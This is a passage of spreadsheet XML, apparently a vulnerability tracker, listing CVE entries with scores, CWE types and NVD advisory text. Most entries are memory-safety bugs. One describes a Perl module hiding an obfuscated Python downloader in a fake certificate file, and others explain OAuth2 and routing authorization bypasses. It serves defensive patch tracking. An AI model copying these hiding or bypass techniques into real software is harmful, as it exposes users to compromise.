        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C787" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88351</t>
        </is>
      </c>
      <c r="D787" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E787" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F787" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G787" s="5" t="inlineStr"/>
      <c r="H787" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I787" s="5" t="inlineStr"/>
      <c r="J787" s="5" t="inlineStr"/>
      <c r="K787" s="5" t="inlineStr"/>
      <c r="L787" s="5" t="inlineStr"/>
      <c r="M787" s="5" t="inlineStr"/>
      <c r="N787" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O787" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P787" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q787" s="5" t="inlineStr"/>
      <c r="R787" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S787" s="5" t="inlineStr">
        <is>
          <t>An integer overflow vulnerability exists in the MPack Node API in MPack 1.1.1 on 32-bit platforms. When parsing a specially crafted MessagePack array32 or map32 object with an excessively large element count, the page allocation size calculation in mpack_tree_parse_children() can overflow size_t and produce an undersized allocation. Subsequent parsing writes mpack_node_data_t records beyond the allocated heap buffer, resulting in heap-buffer-overflow, memory corruption, and denial of service.</t>
        </is>
      </c>
      <c r="T787" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88351</t>
        </is>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B788" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C788" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97230</t>
        </is>
      </c>
      <c r="D788" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E788" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F788" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G788" s="5" t="inlineStr"/>
      <c r="H788" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I788" s="5" t="inlineStr"/>
      <c r="J788" s="5" t="inlineStr">
        <is>
          <t>f5, python</t>
        </is>
      </c>
      <c r="K788" s="5" t="inlineStr"/>
      <c r="L788" s="5" t="inlineStr"/>
      <c r="M788" s="5" t="inlineStr"/>
      <c r="N788" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O788" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P788" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q788" s="5" t="inlineStr"/>
      <c r="R788" s="5" t="inlineStr">
        <is>
          <t>CWE-506</t>
        </is>
      </c>
      <c r="S788" s="5" t="inlineStr">
        <is>
          <t>IO::Socket::SSL::SelfCertificate versions 1.00 for Perl contains malware which executes Python code from an obfuscated URL.
The generate_certificate runs a Python script saved as a certificate file.  The pyhton script attempts to retrieve code from a hardcoded http URL that is obfuscated with base64 encoding and run the response body directly.
The impact is that arbitrary code can be invoked as the user, without a dropped script being saved on the affected host.
The releases have no test scripts nor build hooks.  The intention may have been to trigger the payload after installation.
The dropper script is in lib/Crypt/SelfCertificate/sample/cert.pem.
This is similar to CVE-2026-95831 for the module Crypt::SelfCertificate.
The SHA-256 digests of the files are
    ba24ee8ec3b7f47f65bed62e16fb413ace50653cf44bd8ea90914390922831e0  IO-Socket-SSL-SelfCertificate-1.00.tar.gz
    821d38830e5eb8607738421c25ac25f59fff02a6ab67daa32fbd020429454dac  IO-Socket-SSL-SelfCertificate-1.00/lib/IO/Socket/SSL/SelfCertificate/sample/cert.pem
    d483cb7b23b7271cb11cf242bff4a2e1c02df0b9525eb0429abeea8961c399d5  IO-Socket-SSL-SelfCertificate-1.00-upload.tar.gz</t>
        </is>
      </c>
      <c r="T788" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97230</t>
        </is>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B789" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C789" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51994</t>
        </is>
      </c>
      <c r="D789" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E789" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F789" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G789" s="5" t="inlineStr"/>
      <c r="H789" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I789" s="5" t="inlineStr"/>
      <c r="J789" s="5" t="inlineStr"/>
      <c r="K789" s="5" t="inlineStr"/>
      <c r="L789" s="5" t="inlineStr"/>
      <c r="M789" s="5" t="inlineStr"/>
      <c r="N789" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O789" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P789" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q789" s="5" t="inlineStr"/>
      <c r="R789" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S789" s="5" t="inlineStr">
        <is>
          <t>mcp-remote versions 0.1.32 through 0.1.38 are vulnerable to Server-Side Request Forgery (SSRF) via the resource_metadata URL extracted from a remote MCP server's WWW-Authenticate header</t>
        </is>
      </c>
      <c r="T789" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51994</t>
        </is>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B790" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C790" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92288</t>
        </is>
      </c>
      <c r="D790" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E790" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F790" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G790" s="5" t="inlineStr"/>
      <c r="H790" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I790" s="5" t="inlineStr"/>
      <c r="J790" s="5" t="inlineStr"/>
      <c r="K790" s="5" t="inlineStr"/>
      <c r="L790" s="5" t="inlineStr"/>
      <c r="M790" s="5" t="inlineStr"/>
      <c r="N790" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O790" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P790" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q790" s="5" t="inlineStr"/>
      <c r="R790" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="S790" s="5" t="inlineStr">
        <is>
          <t>Lemonldap::NG::Portal versions from 2.20.0 before 2.21.6, from 2.22.0 before 2.23.4 for Perl allow unauthenticated OAuth2 token introspection because checkEndPointAuthenticationCredentials does not verify the client secret of a public Relying Party.
checkEndPointAuthenticationCredentials() skips the secret comparison for a Relying Party marked public and still returns the authentication method deduced from the request, client_secret_basic or client_secret_post. introspection() rejects a caller only when that method is missing or none, so a request carrying a public client_id and an arbitrary or empty secret passes the endpoint's authentication check.
An attacker who holds an access token and knows the client_id of any public Relying Party can confirm the token is active and read its metadata, including scope, audience, expiry and the sub claim. The sub claim is computed with the calling Relying Party's user identifier attribute, so an attacker can translate a user identifier from one Relying Party to another, defeating per-client and pseudonymous identifiers.</t>
        </is>
      </c>
      <c r="T790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92288</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B791" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51997</t>
        </is>
      </c>
      <c r="D791" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E791" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F791" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G791" s="5" t="inlineStr"/>
      <c r="H791" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I791" s="5" t="inlineStr"/>
      <c r="J791" s="5" t="inlineStr"/>
      <c r="K791" s="5" t="inlineStr"/>
      <c r="L791" s="5" t="inlineStr"/>
      <c r="M791" s="5" t="inlineStr"/>
      <c r="N791" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O791" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P791" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q791" s="5" t="inlineStr"/>
      <c r="R791" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-918, CWE-94</t>
        </is>
      </c>
      <c r="S791" s="5" t="inlineStr">
        <is>
          <t>An issue in geelen mcp-remote 0.1.16 through 0.1.38 allows a remote attacker to execute arbitrary code via the open() functions</t>
        </is>
      </c>
      <c r="T791" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51997</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B792" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85491</t>
        </is>
      </c>
      <c r="D792" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E792" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F792" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G792" s="5" t="inlineStr"/>
      <c r="H792" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I792" s="5" t="inlineStr"/>
      <c r="J792" s="5" t="inlineStr"/>
      <c r="K792" s="5" t="inlineStr"/>
      <c r="L792" s="5" t="inlineStr"/>
      <c r="M792" s="5" t="inlineStr"/>
      <c r="N792" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O792" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P792" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q792" s="5" t="inlineStr"/>
      <c r="R792" s="5" t="inlineStr">
        <is>
          <t>CWE-1023, CWE-706</t>
        </is>
      </c>
      <c r="S792" s="5" t="inlineStr">
        <is>
          <t>Catalyst::Seal versions before 0.03 for Perl allow one request to disable a path or route a later one past an authorization check via a dispatch memo keyed on the request path alone.
Catalyst::Seal replaces the dispatcher's prepare_action with a version that memoises how a path resolved: which dispatch type matched, at which level, and what was left over as arguments. The key is the request path and nothing else. Action roles that match on the method, content type, scheme or query make that resolution depend on state the key does not carry, so the memo answers for a request it was not built from.
A path that resolves to no action is memoised as well, and replaying that entry returns without consulting any dispatch type, so no action is set and the request fails. A GET of a path whose action is declared POST-only therefore disables that path for every later request, the correct POST included. An entry that did resolve replays the level the earlier descent reached. Where a POST-only action sits below a shallower action on the same path, a GET memoises the shallow route, and a later POST is dispatched there with an auto() guarding the deeper controller never running.
The memo is cleared only when an action is registered, which happens at setup, so an entry lasts for the life of the process, and its cap of 2048 entries bounds how many paths one caller can disable. In the configuration measured, the misroute lands on the less privileged action, so it is an authorization check not running rather than a privilege gain.</t>
        </is>
      </c>
      <c r="T792" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85491</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B793" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88361</t>
        </is>
      </c>
      <c r="D793" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E793" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F793" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G793" s="5" t="inlineStr"/>
      <c r="H793" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I793" s="5" t="inlineStr"/>
      <c r="J793" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K793" s="5" t="inlineStr"/>
      <c r="L793" s="5" t="inlineStr"/>
      <c r="M793" s="5" t="inlineStr"/>
      <c r="N793" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O793" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P793" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q793" s="5" t="inlineStr"/>
      <c r="R793" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S793" s="5" t="inlineStr">
        <is>
          <t>SumatraPDF 3.6.1 contains an integer overflow vulnerability in EngineMupdf::BuildPageLabelRec() when parsing PDF PageLabels /Nums entries.</t>
        </is>
      </c>
      <c r="T793" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88361</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B794" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88362</t>
        </is>
      </c>
      <c r="D794" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E794" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F794" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G794" s="5" t="inlineStr"/>
      <c r="H794" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I794" s="5" t="inlineStr"/>
      <c r="J794" s="5" t="inlineStr"/>
      <c r="K794" s="5" t="inlineStr"/>
      <c r="L794" s="5" t="inlineStr"/>
      <c r="M794" s="5" t="inlineStr"/>
      <c r="N794" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O794" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P794" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q794" s="5" t="inlineStr"/>
      <c r="R794" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S794" s="5" t="inlineStr">
        <is>
          <t>MuJS e892c9fdb contains an incorrect numeric conversion vulnerability in jsR_isindex() in jsrun.c. A specially crafted JavaScript input containing an excessively large numeric array index can cause an out-of-range floating-point value to be converted to an integer without proper range validation. This results in undefined behavior and can cause process termination, leading to denial of service.</t>
        </is>
      </c>
      <c r="T794" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88362</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B795" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88373</t>
        </is>
      </c>
      <c r="D795" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E795" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F795" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G795" s="5" t="inlineStr"/>
      <c r="H795" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I795" s="5" t="inlineStr"/>
      <c r="J795" s="5" t="inlineStr"/>
      <c r="K795" s="5" t="inlineStr"/>
      <c r="L795" s="5" t="inlineStr"/>
      <c r="M795" s="5" t="inlineStr"/>
      <c r="N795" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O795" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P795" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q795" s="5" t="inlineStr"/>
      <c r="R795" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S795" s="5" t="inlineStr">
        <is>
          <t>libde265 commit 4d45a6b contains a NULL pointer dereference vulnerability in the NAL parsing path. When de265_push_NAL() is called with a zero-length NAL unit, the resulting NAL_unit may retain a NULL backing buffer, which is subsequently passed as the destination argument to memcpy() in NAL_unit::set_data(). Although the copy length is zero, this violates the nonnull requirement of memcpy() and results in undefined behavior, causing process termination in UBSan-instrumented builds and denial of service.</t>
        </is>
      </c>
      <c r="T795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88373</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B796" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C796" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88388</t>
        </is>
      </c>
      <c r="D796" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E796" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F796" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G796" s="5" t="inlineStr"/>
      <c r="H796" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I796" s="5" t="inlineStr"/>
      <c r="J796" s="5" t="inlineStr"/>
      <c r="K796" s="5" t="inlineStr"/>
      <c r="L796" s="5" t="inlineStr"/>
      <c r="M796" s="5" t="inlineStr"/>
      <c r="N796" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O796" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P796" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q796" s="5" t="inlineStr"/>
      <c r="R796" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S796" s="5" t="inlineStr">
        <is>
          <t>Espruino 2v29 (commit bffc6d0) contains a stack-based buffer overflow vulnerability in the JavaScript error stack-trace handling path on 64-bit builds. A remote attacker can supply JavaScript input that triggers an exception and reaches jslPrintTokenLineMarker(), which passes the address of a 4-byte int column variable to jsvGetLineAndCol() as a size_t pointer. jsvGetLineAndCol() performs an 8-byte write through the mismatched pointer, overwriting adjacent stack memory.</t>
        </is>
      </c>
      <c r="T796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88388</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B797" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88369</t>
        </is>
      </c>
      <c r="D797" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E797" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F797" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G797" s="5" t="inlineStr"/>
      <c r="H797" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I797" s="5" t="inlineStr"/>
      <c r="J797" s="5" t="inlineStr"/>
      <c r="K797" s="5" t="inlineStr"/>
      <c r="L797" s="5" t="inlineStr"/>
      <c r="M797" s="5" t="inlineStr"/>
      <c r="N797" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O797" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P797" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q797" s="5" t="inlineStr"/>
      <c r="R797" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S797" s="5" t="inlineStr">
        <is>
          <t>zserge jsmn commit 25647e6 is vulnerable to Buffer Overflow in example/jsondump.c dump().</t>
        </is>
      </c>
      <c r="T797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88369</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B798" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53493</t>
        </is>
      </c>
      <c r="D798" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E798" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F798" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G798" s="5" t="inlineStr"/>
      <c r="H798" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I798" s="5" t="inlineStr"/>
      <c r="J798" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K798" s="5" t="inlineStr"/>
      <c r="L798" s="5" t="inlineStr">
        <is>
          <t>go:github.com/containerd/containerd, go:github.com/containerd/containerd/v2</t>
        </is>
      </c>
      <c r="M798" s="5" t="inlineStr">
        <is>
          <t>1.7.36, 2.0.13, 2.2.9, 2.3.6, 2.4.1</t>
        </is>
      </c>
      <c r="N798" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O798" s="5" t="inlineStr"/>
      <c r="P798" s="5" t="inlineStr"/>
      <c r="Q798" s="5" t="inlineStr"/>
      <c r="R798" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770, CWE-834</t>
        </is>
      </c>
      <c r="S798" s="5" t="inlineStr">
        <is>
          <t>### Impact
A vulnerability exists in containerd's image pull handlers where a crafted OCI image index containing deeply nested or heavily fanned-out descriptor graphs can cause unbounded CPU and memory consumption. During the `PullImage` operation, the recursive traversal and processing of child descriptors lack sufficient depth and breadth limits, and fail to adequately deduplicate identical descriptors. This unbounded traversal leads to excessive resource allocation.
Consequently, pulling a malicious image reference can result in prolonged stalls during container creation and significant resource pressure on the host system. This issue occurs entirely during the image pull phase, prior to any container execution.
### Patches
This bug has been fixed in containerd 2.4.1, 2.3.6, 2.2.9, 2.0.13, and 1.7.36. Users should update to these versions to resolve the issue.
### Workarounds
There are no known workarounds for this issue. Users are advised to only pull trusted images from known registries until the patch can be applied.
### Credits
The containerd project would like to thank Jakub Ciolek at ElevenLabs and @jlgore who independently discovered and responsibly disclosed this issue in accordance with the [containerd security policy](https://github.com/containerd/project/blob/main/SECURITY.md).
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [containerd](https://github.com/containerd/containerd/issues/new/choose)
* Email us at [security@containerd.io](mailto:security@containerd.io)
To report a security issue in containerd:
* [Report a new vulnerability](https://github.com/containerd/containerd/security/advisories/new)
* Email us at [security@containerd.io](mailto:security@containerd.io)</t>
        </is>
      </c>
      <c r="T798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53493</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B799" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88359</t>
        </is>
      </c>
      <c r="D799" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E799" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F799" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G799" s="5" t="inlineStr"/>
      <c r="H799" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I799" s="5" t="inlineStr"/>
      <c r="J799" s="5" t="inlineStr"/>
      <c r="K799" s="5" t="inlineStr"/>
      <c r="L799" s="5" t="inlineStr"/>
      <c r="M799" s="5" t="inlineStr"/>
      <c r="N799" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O799" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P799" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q799" s="5" t="inlineStr"/>
      <c r="R799" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S799" s="5" t="inlineStr">
        <is>
          <t>libfyaml 0.9.6 contains a stack exhaustion vulnerability in fy_atom_iter_format(). When processing a specially crafted YAML document containing a very large literal or folded block scalar, the function repeatedly grows an internal buffer using alloca() inside a loop. The allocated stack memory is not released until the function returns, causing cumulative stack growth that can exceed the process stack limit and result in SIGSEGV and denial of service.</t>
        </is>
      </c>
      <c r="T799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88359</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B800" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88367</t>
        </is>
      </c>
      <c r="D800" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E800" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F800" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G800" s="5" t="inlineStr"/>
      <c r="H800" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I800" s="5" t="inlineStr"/>
      <c r="J800" s="5" t="inlineStr"/>
      <c r="K800" s="5" t="inlineStr"/>
      <c r="L800" s="5" t="inlineStr"/>
      <c r="M800" s="5" t="inlineStr"/>
      <c r="N800" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O800" s="5" t="inlineStr">
        <is>
          <t>2026-09-24</t>
        </is>
      </c>
      <c r="P800" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q800" s="5" t="inlineStr"/>
      <c r="R800" s="5" t="inlineStr">
        <is>
          <t>CWE-681</t>
        </is>
      </c>
      <c r="S800" s="5" t="inlineStr">
        <is>
          <t>NanoSVG 239e102ec contains an incorrect numeric conversion vulnerability in nsvg__curveDivs() during SVG stroke rasterization. A specially crafted SVG document containing an extremely large stroke-width can cause floating-point rounding to produce a zero subdivision angle. The subsequent arc division yields infinity, which is converted to int without range validation, resulting in undefined behavior and process termination, leading to denial of service.</t>
        </is>
      </c>
      <c r="T800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88367</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B801" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95811</t>
        </is>
      </c>
      <c r="D801" s="5" t="n">
        <v>6.5</v>
      </c>
